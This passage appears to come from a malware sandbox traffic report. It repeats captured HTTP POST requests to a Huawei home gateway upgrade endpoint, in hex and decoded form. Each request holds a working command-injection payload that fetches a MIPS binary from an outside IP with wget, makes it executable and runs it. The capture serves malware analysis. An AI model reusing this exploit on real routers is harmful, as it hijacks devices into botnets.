44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 